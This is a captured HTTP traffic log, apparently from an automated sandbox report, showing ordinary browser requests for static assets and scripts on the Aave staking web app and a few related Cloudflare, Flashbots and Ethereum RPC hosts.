Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Medium.dc792b50.woff2 HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.aave.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/Inter-Bold.579e0f95.woff2 HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.aave.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.aave.com/_next/static/css/0da2d62e1a58e826.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aave-com-logo-header.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/networks/zksync.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /flashbots-protect/quick-start HTTP/1.1Host: docs.flashbots.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7603.58cb27010e0a12d8.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9388.ff9a5272b437e6f3.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1573-e710bb2ca0646568.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4254-a9fee39d0c27297f.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6790.20f08621bfb8840e.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/gho.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/mainnet HTTP/1.1Host: cloudflare-eth.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/stkbptv2.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aave-com-logo-header.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/networks/zksync.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/aave.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/networks/ethereum.svg HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1066.2c0391345744a196.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/425.092c8e24fce5a024.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/gho.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/501.564b7abbe0ff055e.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8345.c21c07eb7538546d.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/aave.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/networks/ethereum.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icons/tokens/stkbptv2.svg HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7416.0f6b78b314050ddc.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1066.2c0391345744a196.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7888.cef2f62e0e233dfc.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/425.092c8e24fce5a024.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6806.18ebffe630a5cedb.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/797.3519e0e5bb08cfaa.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6745.f8196274743a395d.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5780.fe39358b1d632e65.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2431.f5a5acbb8bd2a9de.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9410.9b52440c93125af8.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1367.e6cb3b6253483840.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6211.0162dd216a599ca3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1811.176323f7838502d3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /application-services/products/web3/ HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=PgqFTlEBbGY_EfZJRhQU52zUW0xdvnX1xdT694RQlsI-1727496728-1.0.1.1-lJ7MRdoznbgUYWapQQJtW2l_HJI9rIgC53Ns4YHwKC1rzKeOqSOR6nauw41fznOhbpFHdxBIgMqOFTupXtpn0Vo7VHjiN8Oxn2jkaSL76Vg
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3695.9b23cacc12b097a3.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9287.367ffb9426ce0802.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4423.ed6f3ef6bf1f44f5.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/523.a7e983d8dea8db71.js HTTP/1.1Host: app.aave.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.aave.com/staking/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3629-beffcb1d37e29d12.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8345.c21c07eb7538546d.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/62b3314e123e6f00397f19ca HTTP/1.1Host: eth-mainnet.rpc.grove.cityConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6806.18ebffe630a5cedb.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7888.cef2f62e0e233dfc.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/501.564b7abbe0ff055e.js HTTP/1.1Host: app.aave.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
